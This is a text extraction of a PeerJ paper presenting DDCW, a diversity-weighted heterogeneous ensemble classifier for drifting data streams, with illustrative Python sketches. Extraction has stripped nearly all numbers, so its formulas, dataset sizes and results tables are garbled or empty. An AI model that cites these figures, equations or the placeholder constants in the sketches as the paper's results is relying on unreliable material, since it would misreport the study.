cannot guarantee faster recovery from drifts, but can help to reduce the initial increase in error caused by a drift minku, white & yao ( ). there are several ways to achieve diversity in the ensemble. either the classifiers are trained on different data samples, or the model is composed of a set of heterogeneous classifiers. recently, khamassi et al. ( ) studied the influence of diversity techniques (block-based, weighting-data, and filtering-data) on adaptive ensemble models and designed a new ensemble approach that combines the three diversity techniques. the authors in sidhu & bhatia ( ) experimented with a diversified, dynamic weighted majority voting approach consisting of two ensembles (with low and high diversity, achieved by replacing the poisson ( ) with poisson (κ) distribution in online bagging (oza & russell, )). the kappa updated ensemble (kue) cano & krawczyk ( ) trains its base learners using different subsets of features and updates them with new instances with a given probability following a poisson distribution. 
such an approach results in a higher ensemble diversity and outperforms most of the current adaptive ensembles. however, there are not many studies where the model uses the model diversity score as a criterion for the base classifiers in the ensemble (krawczyk et al. ( )) as opposed to static data processing, where such a complex model exists (lysiak, kurzynski & woloszynski, ). according to yang ( ), diversity correlates with model accuracy. a suitable diversity metric used in ensembles is a paired diversity q statistic (kuncheva, ), which provides information about differences between two base classifiers in the ensemble. another aspect of the ensemble classifiers is the composition of the base classifiers in the model. the most common are homogeneous ensemble methods, which use the same algorithm to train the ensemble members (fernandez-aleman et al., ). on the other hand, heterogeneous approaches are based on the utilization of multiple algorithms to generate ensemble members. such an approach could lead to the creation of more diverse ensembles. for the data stream classification, a heterogeneous ensemble with feature drift for data streams (heft-stream) nguyen et al. ( ) builds a heterogeneous ensemble composed of different online classifiers (e.g., online naive bayes). adaptive modifications of the heterogeneous ensembles were also successfully applied on the sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ drifting data streams (van rijn et al., ; frías-blanco et al., ; van rijn et al., ; idrees et al., ), and many of them proved suitable to address issues such as class imbalance (large, lines & bagnall, ; fernández et al., ; ren et al., ; wang, minku & yao, ; ghaderi zefrehi & altınçay, ). the approach described in this paper aims to combine the construction of the adaptive heterogeneous ensemble with a diversity-based update of the ensemble members. this approach could result in a robust model, with the adaptation mechanism ensuring that newly added members are as diverse as possible during the ensemble updates. maintaining the diversity of the overall model can also lead to a reduction of model updates and therefore faster execution during the run time. ddcw ensemble method in the following section, we introduce the design of the diversified dynamic class weighted (ddcw) ensemble model. the design of the model is based on the assumption that a robust model consists of a collection of heterogeneous base classifiers that are very diverse. when applied to static data, the diversity is used within the ensemble models to tune the combination rule for voting and the aggregation of component classifier predictions. we propose the design of a heterogeneous ensemble model, which combines the dynamic weighting of the ensemble members with the mutual diversity score criterion. the diversity measures are used to rank the members within the ensemble and update their weights according to the diversity value, so the model prefers experts with higher mutual diversity, thereby creating a more robust ensemble. when ranking the base classifiers, the diversity measurement is combined with the lifetime of individual base classifiers in the model. the criterion is expected to cause the importance of the long-lasting base classifiers to gradually fade, which should ensure the relevance of the whole ensemble to evolving and changing data streams. 
the model is composed of m ensemble members e ,…, em, trained using each chunk of incoming samples in the stream, as depicted in fig. . each of those experts e ,,…, em, have assigned weights for each target class. the weights are tuned after each period (after each chunk is processed) based on individual base classifier performance. first, for each class that a base classifier predicts correctly, the weight is increased. second, after each chunk is processed, the model calculates q pairwise diversity between each of the ensemble members and uses this value to modify model weights. pairwise q diversity metric is calculated as follows (kuncheva & whitaker, ): let z ¼ z ; …; zn be a labeled data set, zj rn coming from the classification problem. the output of a classifier di is an n-dimensional binary vector yi ¼ ½y ;i; …; yn;i�t, such that yj;i ¼ , if di recognizes correctly zj, and otherwise, i ¼ ; …; l. q statistic for two classifiers, di and dk, is then computed as: qi;k ¼ n n �n n n n þn n where n ab is the number of elements zj of z for which yj;i ¼ a and yj;k ¼ b. q varies between − and ; classifiers that tend to recognize the same samples correctly will have positive values of q, and those that commit errors on different objects will render q negative. for statistically independent classifiers, the value of qi,k is . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the value for each member div_ei in ddcw model is obtained as the average of contributions of individual pair diversities and is calculated as follows: div ei ¼ m� pm k¼ ;k ¼i qi;k. then, after each period, the lifetime coefficient ti of each ensemble member is increased. afterwards, the weights of each of the base classifiers are modified using the lifetime coefficient. after this step, the weights are normalized for each class, and a score is calculated for each target class by the classifier predictions. in the last step, the global ensemble model prediction is selected as a target class with the highest score. model weights can be represented as a matrix w m�c , where m is a number of classifiers in the ensemble, and c is a number of target classes in the data. the weights wi,j directly determine the weight given to classifier i for class j as seen in table . in the beginning, the weights are initialized equally, based on the number of classes in the data. during the process, the individual weights for each base classifier and corresponding target class are modified using the parameter β. the weight matrix allows the calculation of the score of the base classifiers, as well as the score of predicted target classes. the score of the classifier is calculated as pc j¼ wi;j for each classifier. this score allows the identification of poorly performing base classifiers in the ensemble. however, the score of the target class is calculated as the contribution of weight wi,j of classifier i and its predicted class j. figure overall scheme of the proposed ensemble model. full-size doi: . /peerj-cs. /fig- table weight matrix. c c … cc classifier score e w , w , … w ,c pc j¼ w ;j e w , w , … w ,c pc j¼ w ;j … … … … … … em wm, wm, … wm,c pc j¼ wm;j sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the weight matrix enables the efficient contribution of each of the ensemble members in building the model. 
we proceeded from the assumption of having a diverse ensemble. such a model could consist of members, which perform differently in specific target class values, e.g., some of the members are more precise when predicting a particular class than others and vice versa. in that case, we can use a set of classifiers; each of them focused on a different target class (while the distribution of these classes may change over time). the class weighting alone may lead to an ensemble consisting of similar, well-performing models. but the combination of class weighting with diversity measure can lead to a set of balanced members, more focused on specific classes and complementing each other. the proposed ensemble model belongs to the category of passive chunk-based adaptive models. in the presented approach, the size of the model dynamically changes according to the global model performance. the minimum size of the model is set by the parameter k, and the maximum size is set by the parameter l. each base classifier in the ensemble is assigned with a weight vector for each target class. if a new target class appears in the chunk used in training, the new target will be added to the weight vector for each base classifier. initially, the ensemble consists of a randomly initialized set from a list of defined base algorithms (hoeffding tree or naive bayes). other experts can be added in the following periods (interval representing the chunk of arriving data, where base learners and their weights are modified) until the minimum size of the model is reached, i.e., either the model size is smaller than the defined minimum size or the particular member weight falls under the defined threshold. in each iteration, the experts are used to predict the target class of incoming samples in the processed chunk (lines – ). if a prediction of an expert is correct, the weights of the particular expert and target class are multiplied by a coefficient β (line ). in the case period p has occurred, q statistic diversity is calculated for each pair of experts in the ensemble, and the weights of each expert is modified using the particular expert’s diversity (line and ). this mechanism enables the construction of more robust ensembles, by preferring the diverse base models. the weights of base classifiers are also reduced by the exponential value of their lifetime in the ensemble (line ). in this case, the lifetime of the expert represents the number of periods since its addition to the ensemble. the exponential function is used, so the experts are influenced minimally during their initial periods in the ensemble but become more significant for the long-lasting members. this implementation works as a gradual forgetting mechanism of the ensemble model, as the weakest experts are gradually removed from the model and replaced by the new ones. after the update, the weights are normalized for each target class (line ). afterwards, if the maximum size of the model is reached and the global prediction is incorrect, the weakest expert is removed from the ensemble (line ). a new random expert can then be added to the ensemble (lines – ). in each period, all experts where the sum of weights is lower than defined threshold θ are removed from the ensemble. in the end, each sample is weighted by a random uniform value m times, where m represents the actual size of ensemble (line ). each expert is than trained with a new set of incoming sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ algorithm diversified dynamic class weighted ensemble. procedure: ddcw({x, y}, p, k, l, α, β, θ) input: data and labels {x, y}, chunk size p, min_experts k, max_experts l, fading factor α, multiplier β, threshold θ output: global predictions g : experts ← create_random_experts(k); : initialize class weights wi,j : for s = ,…,n do : for i = ,…, num_experts(experts) do : local_predictions = classify(expertsi, xs); : if local_predictions = ys then : wi,l = β * wi,l; ← multiply weight of particular expert and target class from local prediction by β : end if : end for : if all samples in a chunk are processed then : local_predictions = classify(experts, x_s); : diversity = calculate_diversity(local_predictions, y_s); : for i = ,…, num_experts(experts) do : expert_lifetime ← increase expert lifetime in each period; : wi = wi – (exp(α * expert_lifetime) – )/ ; : wi = wi ( – diversityi); : end for : end if : for j = ,…,class_labels do : global_predictionsj ← sum(wj); : end for : global_predictions ← argmax(global_predictionsj); : if all samples in chunk are processed then : w ← normalize_weights(w); : if global_predictionss! = ys then : if num_experts(experts) == l then : {experts, w, expert_lifetime} ← remove weakest expert ei based on experts score : end if : if num_experts(experts) < l then : expertsnew ← create_random_expert(); : wnew ← /num_experts(experts); : end if : end if : {experts, w, expert_lifetime} ← remove experts which score is below threshold θ (continued) sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ samples, with individual weights from the last chunk of data (line ). after training, the global predictions of actual samples are retrieved, and the algorithm then continues back to line . datasets description to experimentally evaluate the performance of the presented approach, we decided to use both real-world and synthetically generated datasets. we tried to include multiple drifting datasets that contain different types of concept drift. datasets used in the experiments are summarized in table . real datasets in our study, we used real datasets, including the frequently used elec dataset (harries, ), the kdd challenge dataset (tavallaee et al., ), covtype (blackard, ), the airlines dataset introduced by ikonomovska (http://kt.ijs.si/elena_ ikonomovska/data.html), and data streams from the openml platform bischl et al. ( ) generated from a real-world dataset using a bayesian network generator (bng) van rijn et al. ( ). we included a wide range of datasets to evaluate the performance of the ddcw model on datasets with both binary and multi-class targets or with balanced and imbalanced classes, especially some of them, such as kdd and shuttle are heavily imbalanced. to examine the imbalance degree of the datasets, we included the class ratios in the documentation on the github repository (https://github.com/miso-k/ddcw/ blob/master/classratios.txt). as it is difficult to determine the type of a real drift contained in such data, we tried to estimate and visualize possible drift occurrences. multiple techniques for concept drift visualization exist (pratt & tschapek, ). we used visualization based on feature importance (using the gini impurity) and the respective changes within the datasets, as they may signalize changes in concepts in the data. 
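to complement the listing above, the following is a simplified python sketch of the end-of-chunk update that the algorithm describes: computing the pairwise q statistics, averaging them into a per-expert diversity score, applying the lifetime fading and the diversity factor to the class-weight matrix, and normalizing the weights per class. it is an illustrative reconstruction rather than the authors' implementation, and the numeric constants (alpha and the fading divisor) are placeholders, not the settings used in the paper.

import numpy as np

def q_statistic(correct_i, correct_j):
    """pairwise q statistic from boolean 'classified correctly' vectors of two experts."""
    n11 = np.sum(correct_i & correct_j)
    n00 = np.sum(~correct_i & ~correct_j)
    n10 = np.sum(correct_i & ~correct_j)
    n01 = np.sum(~correct_i & correct_j)
    denom = n11 * n00 + n01 * n10
    return 0.0 if denom == 0 else (n11 * n00 - n01 * n10) / denom

def ddcw_chunk_update(W, chunk_correct, lifetimes, alpha=0.002):
    """one end-of-chunk update of the class-weight matrix W (experts x classes).

    chunk_correct is a boolean matrix (experts x samples) that is true where an
    expert classified a sample of the processed chunk correctly.
    """
    m = W.shape[0]
    # average pairwise diversity contribution of each expert (div_e_i)
    div = np.zeros(m)
    for i in range(m):
        others = [q_statistic(chunk_correct[i], chunk_correct[k]) for k in range(m) if k != i]
        div[i] = np.mean(others) if others else 0.0
    lifetimes += 1                                               # each expert survived one more period
    W = W - (np.exp(alpha * lifetimes)[:, None] - 1.0) / 2.0     # fading of long-lived experts; divisor chosen for illustration
    W = W * (1.0 - div)[:, None]                                 # prefer experts that disagree with the rest
    W = np.clip(W, 0.0, None)                                    # keep weights non-negative (simplification)
    W = W / W.sum(axis=0, keepdims=True)                         # normalize weights per class
    return W, lifetimes

# usage on dummy data: 3 experts, 4 classes, chunk of 100 samples
rng = np.random.default_rng(1)
W = np.full((3, 4), 1.0 / 4)
correct = rng.random((3, 100)) < 0.8
W, lifetimes = ddcw_chunk_update(W, correct, np.zeros(3))
print(W.round(3))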
based on the work described in cassidy & deviney ( ), we used feature importance scores derived from the online random forest model trained on the datasets. such an approach can help to visualize the so-called feature drift, which occurs when certain algorithm (continued) : if num_experts(experts) < k then : expertsnew ← create_random_expert(); : wnew ← /num_experts(experts); : end if : end if : for i = ,…, num_experts(experts) do : sample_weightss ← random_uniform_weight(); : expertsi ← learn_expert(expertsi, xs, ys, sample_weightss); : end for : return global_predictions; : end for sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://kt.ijs.si/elena_ikonomovska/data.html http://kt.ijs.si/elena_ikonomovska/data.html https://github.com/miso-k/ddcw/blob/master/classratios.txt https://github.com/miso-k/ddcw/blob/master/classratios.txt http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ features stop (or start) being relevant to the learning task. fig. shows such visualizations for the real-world datasets used in the experiments. the visualization depicts how the importance of the features changes over time in the data. x-axis represents number of samples, y-axis feature indices and the size of the dots correspond to a feature importance in the given chunk. synthetic datasets besides the real-world datasets, we used synthetic data streams containing generators with various types of drifts. in most cases (except led and stagger data), we used streams of , , samples, with three simulated drifts. we used the agrawal generator (agrawal, imieliński & swami, ) and sea (nick street & kim, ) generators with abrupt and gradual drifts, rbf and waveform streams without any drift and with simulated gradual drift, a stagger concepts generator (schlimmer & granger, ) with abrupt drift, an led (gordon et al., ) stream with gradual drift, and a mixed stream with an abrupt drift with balanced and imbalanced target attributes. table datasets used in the experiments. (dataset type) r: real, s: synthetic. (drift type) a: abrupt, g: gradual, –: none, ?: unknown. dataset drift type dataset type samples features classes elec ? r , kdd ? r , airl ? r , covt ? r , shuttle ? r , powersupply ? r , connect- ? r , bng_bridges ? r , , bng_bridges vsall ? r , , bng_hepatitis ? r , , bng_zoo ? r , , bng_lymph ? r , , agra a s , , agrg g s , , seaa a s , , seag g s , , stagger a s , led g s , mixed_balanced a s , , mixed_imbalanced a s , , rbf – s , , rbf_drift g s , , waveform – s , , waveform_drift g s , , sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experimental results the purpose of the experiments was to determine the performance of the ddcw model in a series of different tests. we used the python implementation of all models, and the experiments were performed using the scikit-multiflow framework (montiel et al., ). all experiments were performed on a virtual server equipped with cpu cores and gb ram. during the first series of experiments, we aimed to examine the impact of the different setting of the chunk-size parameter in which the model is updated and the diversity is figure feature importance progress in the real-world datasets. (a) elec, (b) airlines, (c) kdd , (d) covtype, (e) shuttle, (f) connect- (x axis) number of samples (y axis) feature indices, the size of the dots correspond to a feature importance in the given chunk. full-size doi: . /peerj-cs. 
/fig- sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ calculated. the model was tested with varying sizes of the chunk, with values set to , , , , , and , samples on all considered datasets. the primary motivation of the experiments was to find the most suitable chunk size parameter for different datasets, which will be used to compare the ddcw with other ensemble models. to evaluate the models, we used prequential evaluation (or interleaved test-then-train evaluation), in which the testing is performed on the new data before they are used to train the model. in the second set of the experiments, the main goal was to compare the performance of the ddcw model with the selected other streaming ensemble-based classifiers. we considered multiple ensemble models: dwm, awe, online boosting, ozabagging, and the currently best performing streaming ensembles such as arf and kue. to analyze the performance of these models, standard classification metrics were used (accuracy, precision, recall, and f ). besides the comparison of the model performance, we measured the metrics related to resource consumption, such as total time required for training, scoring time of an instance, and memory requirements of the models. during these experiments, we set the chunk size to , samples (although we included ddcw with a chunk size of samples for comparison) and set the model’s hyper-parameters to create similar-sized ensemble models (min. and max. members in the ensemble). performance with the different chunk sizes in this experiment, we explored the influence of the chunk window on the classifier’s performance on different datasets. the main goal was to find the optimal chunk window size for a particular dataset. we set different chunk sizes and measured the model performance using selected metrics in defined periods (e.g., every samples). we computed the average model performance on the entire dataset using the above-mentioned classification metrics. a comparison of the ddcw classifier accuracy and f with different sizes of the chunks is shown in table . besides setting the chunk size, we fine-tuned the model hyper-parameters. our main objective was to estimate the suitable combinations of the parameters α, β, and θ. as the experiments were computationally intensive, most of the models were trained using the default hyper-parameter settings, with particular values set to α = . , β = , and θ = . . regarding the model behavior with different hyper-parameter settings, α influences the lifetime of an expert in the ensemble and the speed of degradation of the expert score with increasing lifetime. increasing values led usually to a more dynamic model, able to adapt rapidly, while lower values led to a more stable composition of the model. β influences the preference of the experts, which classified the samples correctly. higher values of this parameter can suppress the poor-performing experts and raise the probability of updating them in the following iteration. θ serves as a threshold for the expert update. lower values usually lead to more weak experts in the ensemble, a marginal contribution to the performance , but raise the model complexity significantly. higher values force the updating of weak experts. however, some of them may be missing later on, after drift occurrence and the reappearance of previous concepts. sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table performance of the ddcw model with different chunk sizes. bold values show the best results. chunk size , accuracy accuracy accuracy accuracy accuracy accuracy elec . . . . . . kdd . . . . . . airl . . . . . . covt . . . . . . shuttle . . . . . . powersuply . . . . . . connect . . . . . . bng_bridges . . . . . . bng_bridges vsall . . . . . . bng_hepatitis . . . . . . bng_zoo . . . . . . bng_lymph . . . . . . agra . . . . . . agrg . . . . . . seaa . . . . . . seag . . . . . . stagger . . . . . . led . . . . . . mixed_balanced . . . . . . mixed_imbalanced . . . . . . rbf . . . . . . rbf_drift . . . . . . waveform . . . . . . waveform_drift . . . . . . f f f f f f elec . . . . . . kdd . . . . . . airl . . . . . . covt . . . . . . shuttle . . . . . . powersuply . . . . . . connect . . . . . . bng_bridges . . . . . . bng_bridges vsall . . . . . . bng_hepatitis . . . . . . bng_zoo . . . . . . bng_lymph . . . . . . agra . . . . . . agrg . . . . . . seaa . . . . . . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the results proved, that the chunk size does have an impact on the model performance, and there are mostly minor differences in the performance metrics with different chunk size parameter setting. although accuracy is not affected much, f metric improves significantly with larger chunk sizes, especially on the bng_zoo and bng_lymph datasets. in general, we can observe, that on the larger data (with more than , samples in the stream), larger windows resulted in slightly better performance. on the other hand, smaller chunk sizes enable the model to react more quickly to concept drift. in some cases, the accuracy metric proved to be not very useful, as the target class is strongly unbalanced or multi-class. it is evident mostly on the kdd or bng_lymph datasets, where high accuracy values are caused mainly by the classification into the majority class, while other minor classes do not influence this metric very much. a much better perspective on the actual model performance could be given by f measure. the experiments summarized averaged results that the models achieved on the entire stream, but it is also important to explore how the performance progressed during the stream processing and observe their reactions to concept drift. figure visualizes the accuracy achieved by the ddcw models on the real datasets with both chunk sizes. the performance of the method with both settings is overall similar; however, we can see a difference in cases when a change (possible drift) occurs. on the kdd dataset, there is a significant decrease in the accuracy of the model after around , samples. shorter chunk windows resulted in a much earlier reaction to the change, without any significant decrease in performance. on the elec and covtype datasets, the earlier reactions are also present and visible, resulting in higher performance metrics. figure depicts the ddcw model performance on the synthetic datasets with both chunk sizes. in the case of stagger and led datasets, the effects of different chunk sizes are comparable with the impact on the real datasets. larger chunk sizes lead to later reactions to drift and a more significant decrease in accuracy. in contrast, performance evaluation on larger streams, such as agr or mixed streams, showed that the chunk size effect on stream processing is different. 
contrary to the previous datasets, larger chunk sizes resulted in a more robust model, still covering some of the previous concepts after drift occurrence. after the drift, the model performance dropped significantly. when using larger chunk sizes, the model was able to use more data to update the ensemble, which led to improved performance. figure depicts the size of the ensemble during stream processing on selected datasets, with the diversity of the ensemble members disabled and enabled. during the experiments, we set the minimum size of the ddcw ensemble to and the maximum size to . initially, we performed a set of tests to estimate the optimal ensemble size. larger ensembles did not perform significantly better, while the computational complexity of the model was considerably higher. the experiments proved that, during the run time, the algorithm preferred a smaller pool of ensemble members. the algorithm added more ensemble members when a concept drift occurred. enabling the diversity-based selection of experts resulted in a more stable composition of the ensemble and required fewer member updates.

table (continued) performance of the ddcw model with different chunk sizes for the remaining data streams (seag, stagger, led, mixed_balanced, mixed_imbalanced, rbf, rbf_drift, waveform, waveform_drift).

figure performance of the ddcw model on the real datasets: (a) elec, (b) kdd, (c) airlines, (d) covtype, (e) shuttle, (f) powersupply, (g) connect, (h) bng bridges, (i) bng bridges vsall, (j) bng hepatitis, (k) bng zoo, (l) bng lymph; y axis: accuracy, x axis: number of samples.

figure performance of the ddcw model on the synthetic datasets: (a) agr_a, (b) agr_g, (c) sea_a, (d) sea_g, (e) stagger, (f) led, (g) mixed-balanced, (h) mixed-imbalanced, (i) rbf, (j) rbf drift, (k) waveform, (l) waveform drift; y axis: accuracy, x axis: number of samples.

figure size of the ddcw ensemble during the run-time on the selected datasets: (a) airlines, (b) covtype, (c) stagger, (d) agr_a; y axis: number of ensemble members, x axis: number of samples.

comparison with other ensemble models

in these experiments, we compared the ddcw model performance with the selected ensemble models. in the comparison, we included the awe, dwm, online boosting, ozabagging, arf, and kue models. each of the ensemble models was tested with different base learners; we evaluated naive bayes, hoeffding tree, and k-nn as base learners. similar to the previous set of experiments, we used the accuracy, precision, recall, and f metrics for comparison purposes, computed in the prequential fashion.
for the ddcw model, we included both a variant with a combination of naive bayes and hoeffding trees as base learners and a tree-based homogeneous ensemble.

performance comparison

to summarize the experiments, table compares the performance of all evaluated models on the real datasets and table provides a similar comparison on the synthetic data streams. as in the previous experiments, the tables consist of the overall averaged results that the models achieved on the entire stream. while most studies focus only on a comparison of accuracy, we decided to analyze other classification metrics as well. especially in the case of multi-class or heavily imbalanced data (e.g., kdd), accuracy might not be the best choice to truly evaluate the performance of the model; therefore, we also report the f metric. please note that we were unable to properly obtain f values from the kue model on some of the datasets. the ddcw model proved to be suitable for data streams with different concept drifts and either binary or multi-class classification tasks. when considering the composition of the ddcw ensemble, the fact that the model relies on different base learners enables it to utilize the strengths of particular learners. the dynamic composition of the ensemble enables it to adapt to the particular stream by preferring a base learner that is more suitable for the given data.

table comparison of accuracy and f metrics of the evaluated ensemble models on the real data streams (columns: ddcwht, ddcwhtnb, dwmnb, awenb, dwmht, aweht, obknn, ozaknn, obht, ozaht, obnb, ozanb, arfht, kueht; rows: elec, kdd, airl, covt, shuttle, powersuply, connect, bng_bridges, bng_bridges vsall, bng_hepatitis, bng_zoo, bng_lymph; f values for kueht are missing on several datasets).

in general, the ddcw performs very well on the generated streams, gaining at least competitive results compared to the other models on the real-world datasets. the method appears to struggle more with some of the imbalanced datasets, as is apparent from the f results achieved on the kdd or airlines dataset. during this experiment, we also used two different ddcw setups to compare the effect of the base learner selection. we used ddcw with only hoeffding trees as base learners and ddcw with a combination of naive bayes and hoeffding trees. although the homogeneous ensemble mostly performed slightly better, the heterogeneous one was usually faster to train and score while maintaining a similar performance, which was a result of the inclusion of fast naive bayes ensemble members.
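for readers who want to reproduce a comparison of this kind, the snippet below sketches how the compared ensembles can be instantiated with scikit-multiflow, the library the authors report using; the class names follow scikit-multiflow 0.5 and may differ in other releases, and the hyper-parameters shown are illustrative defaults rather than the values used in the paper.

```python
# illustrative model zoo, assuming scikit-multiflow 0.5.x class names
from skmultiflow.trees import HoeffdingTreeClassifier
from skmultiflow.bayes import NaiveBayes
from skmultiflow.lazy import KNNADWINClassifier
from skmultiflow.meta import (
    OzaBaggingClassifier,
    OnlineBoostingClassifier,
    DynamicWeightedMajorityClassifier,
    AccuracyWeightedEnsembleClassifier,
    AdaptiveRandomForestClassifier,
)

def build_models(n_estimators=10):
    """Return a dict of streaming ensembles paired with different base learners."""
    return {
        "DWM-HT": DynamicWeightedMajorityClassifier(base_estimator=HoeffdingTreeClassifier()),
        "AWE-NB": AccuracyWeightedEnsembleClassifier(base_estimator=NaiveBayes()),
        "OzaBag-kNN": OzaBaggingClassifier(base_estimator=KNNADWINClassifier(),
                                           n_estimators=n_estimators),
        "OB-HT": OnlineBoostingClassifier(base_estimator=HoeffdingTreeClassifier(),
                                          n_estimators=n_estimators),
        "ARF-HT": AdaptiveRandomForestClassifier(n_estimators=n_estimators),
    }
```

each of these models exposes the partial_fit/predict interface used in the prequential loop sketched earlier, so the same evaluation code can be run over every entry of the dictionary.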
in a similar fashion, we experimented with integrating k-nn into the ddcw model, but, as expected, k-nn base learners raised the resource requirements of the model and failed to provide a sufficient performance boost, so we did not include k-nn base learners in further experiments. the performance comparison showed that the ddcw method can produce results that are comparable to the related ensemble models on both real and synthetic streams. in many cases, it is able to outperform existing algorithms (e.g., awe, dwm, oza, and ob) in both of the explored metrics. current state-of-the-art methods such as kue and arf usually produce slightly better results, but the ddcw method showed fairly competitive performance, surpassing one of those methods on several datasets in both accuracy and f scores.

table comparison of accuracy and f metrics of the evaluated ensemble models on the synthetic data streams (columns: ddcwht, ddcwhtnb, dwmnb, awenb, dwmht, aweht, obknn, ozaknn, obht, ozaht, obnb, ozanb, arfht, kueht; rows: agra, agrg, seaa, seag, stgr, led, mixed_balanced, mixed_imbalanced, rbf, rbf_drift, waveform, waveform_drift).

however, the evaluation metrics represent only one aspect of the adaptive models' performance. during the experiments, we also evaluated another aspect of the studied models that may influence their run time when deployed in real-world scenarios. we focused mostly on monitoring the models in terms of their demand on resources and their resource consumption during the process. during the experiments, we collected data about the overall run-time aspects of the models. the following section compares the models from the perspective of training/scoring times and memory requirements.

training time and memory usage

we analyzed the training and scoring times and the memory consumption during the training process to provide a different view of the models' performance, comparing performance metrics with resource consumption requirements. we measured the overall training and scoring times on the entire data by summing up all partial re-training and scoring times over the stream. table summarizes the results of all evaluated models. the table compares the total training time consumed in the training and re-training of the models, the total scoring time of all processed instances, and the average size of the model in memory during the entire stream processing. the results represent values averaged over a total of five separate runs of each experiment. it is important to note that the kue model was not included in this comparison.
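a minimal way to collect the training times, scoring times and model sizes described above is sketched below; it is an illustration rather than the authors' instrumentation, assumes a partial_fit/predict-style model, and uses pympler's asizeof (an assumed third-party dependency) to approximate the in-memory size of the model object.

```python
import time
import numpy as np
from pympler import asizeof  # assumed dependency for recursive object sizing

def profile_stream(model, X, y, classes, chunk_size=1000):
    """Accumulate training time, scoring time and average model size over a chunked stream."""
    train_time = score_time = 0.0
    sizes = []
    for start in range(0, len(X) - chunk_size, chunk_size):
        X_chunk, y_chunk = X[start:start + chunk_size], y[start:start + chunk_size]

        if start > 0:  # the model must see at least one chunk before it can score
            t0 = time.perf_counter()
            model.predict(X_chunk)            # scoring (test-then-train)
            score_time += time.perf_counter() - t0

        t0 = time.perf_counter()
        model.partial_fit(X_chunk, y_chunk, classes=classes)
        train_time += time.perf_counter() - t0

        sizes.append(asizeof.asizeof(model) / 1024)  # model size in KB

    return train_time, score_time, float(np.mean(sizes))
```

summing the per-chunk timings over the stream, and averaging the sizes, mirrors how the totals and average memory footprints in the resource-consumption table are reported.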
we used python implementations of all evaluated models and the scikit-multiflow library during the experiments. the kue model was available only in its java implementation using the moa library; therefore, the use of different underlying technologies could influence an objective comparison of resource consumption. at the same time, it is essential to note that the java implementation of the kue model was significantly more efficient than all python-based models, mostly in training times, which were remarkably shorter. the choice of a base classifier heavily influences the overall run-time requirements of all models. most apparently, the choice of k-nnadwin as a base learner for the online bagging and ozabagging methods leads to a massive increase of memory consumption and data processing times. nearest neighbor classifiers need to store the training data in memory, which could lead to increased memory consumption and therefore increased training times. on the other hand, ensembles which consist of naive bayes and hoeffding tree classifiers as the base learners are much faster to train and require significantly less memory during the run-time. however, the online boosting and ozabagging methods are much more sensitive to the number of features of the processed data. this can be observed on the kdd and covtype datasets, where these relatively faster models required significantly longer times to either train or score the instances. the ddcw ensemble training time and memory consumption requirements reflect the fact that the model consists of a mixture of hoeffding tree and naive bayes classifiers.

table comparison of average total training and scoring times (in seconds) and average model size in memory (in kb), reported per dataset for the ddcwht, ddcwhtnb, dwmnb, awenb, dwmht, aweht, obknn, ozaknn, obht, ozaht, obnb, ozanb and arfht models, with separate sections for training times, scoring times and memory.
when experimenting with the homogeneous ddcw ensemble, the performance results were better on many of the datasets. on the other hand, the heterogeneous ddcw model showed a small decrease in performance, but in most cases the inclusion of a naive bayes base learner led to shorter training times and reduced memory usage (most significantly on, e.g., the waveform data, where the training time was reduced to half of the total training time of the homogeneous ddcw ensemble). when taking both aspects into consideration, the ddcw model can in some cases present a compromise between performance and resource requirements. although the online boosting or ozabagging models perform with higher accuracy on some of the datasets, their computational intensiveness and more extended training and scoring times may be a reason to consider a simpler model. similarly, the arf and kue models provide superior performance on the majority of the datasets. when compared to those state-of-the-art methods, the ddcw method produced mostly comparable results, but needed less training time and lower memory requirements (especially on the larger synthetic data streams) than the arf method.
the ddcw ensemble, in this case, may offer a reasonable alternative by providing a well-performing model while maintaining reasonable run-time requirements.

conclusions

in the presented paper, we propose a heterogeneous adaptive ensemble classifier with a dynamic weighting scheme based on the diversity of its base classifiers. the algorithm was evaluated on a wide range of datasets, including real and synthetic ones, with different types of concept drift. during the experiments, we compared the proposed method with several other adaptive ensemble methods. the results proved that the proposed model is able to adapt to drift occurrence relatively fast and is able to achieve at least comparable performance to the existing approaches, on both real and synthetically generated datasets. while still performing well, the model also manages to maintain reasonable resource requirements in terms of memory consumption and the time needed to score unknown samples. the proposed approach is also dependent on the chunk size parameter setting, as the performance of the model on certain datasets changes significantly with different chunk sizes. further research with adaptive heterogeneous ensemble models may lead to an exploration of modifications to the weighting schemes that improve performance in multi-class classification problems or classification of heavily imbalanced data. another interesting field for future work is the integration of adaptation mechanisms with semantic models of the application domain. a domain knowledge model could provide a description of the data, the essential domain concepts, and their relationships. such a model could also be used to improve classification performance by capturing expert domain knowledge and utilizing it in the process of classifying unknown samples. a knowledge model could be used to extract new expert features not previously contained in the data or to extract interesting trends present in the data stream. such extensions could represent expert knowledge and could thus be leveraged to detect frequent patterns leading to concept drift while reducing the time normally needed to adapt the models with that knowledge.

additional information and declarations

funding: the work was supported by the slovak research and development agency under the contract no. apvv- - knowledge-based approaches for intelligent analysis. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures: the following grant information was disclosed by the authors: slovak research and development agency: apvv- - .

competing interests: the authors declare that they have no competing interests.

